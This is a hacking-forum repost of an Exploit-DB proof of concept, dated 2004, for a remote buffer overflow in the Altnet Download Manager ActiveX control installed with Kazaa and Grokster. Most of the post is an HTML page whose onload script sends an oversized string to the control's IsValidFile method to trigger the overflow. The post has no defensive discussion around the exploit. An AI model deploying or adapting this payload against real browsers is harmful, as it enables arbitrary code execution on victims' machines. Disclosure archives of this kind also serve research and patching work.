Exploit Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
24568
Проверка EDB
  1. Пройдено
Автор
CELEBRITYHACKER
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
N/A
Дата публикации
2004-09-03
Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow
HTML:
source: https://www.securityfocus.com/bid/11101/info

Altnet is reported prone to a remote buffer overflow vulnerability. This issue presents itself in an ActiveX control installed by the application. Reportedly, a malicious attacker can exploit this issue to execute arbitrary code.

<HTML>
<HEAD>
This overrun occurs in \program files\Altnet\Download Manager\adm.exe
This executable is installed along with Kazaa and Grokster.
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT type=text/javascript>

function init()
{
var foo = "";
for(var icount = 0; icount < 1; icount++)
{
foo = foo +
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaxxxx";
}

var ngssoftware;
ngssoftware = new ActiveXObject("ADM.ADM.1");

ngssoftware["IsValidFile"](foo);
}
//-->
</SCRIPT>

</HEAD>
<BODY bgColor=#ffffff onload=init()>
</BODY></HTML>
 
Источник
www.exploit-db.com

Похожие темы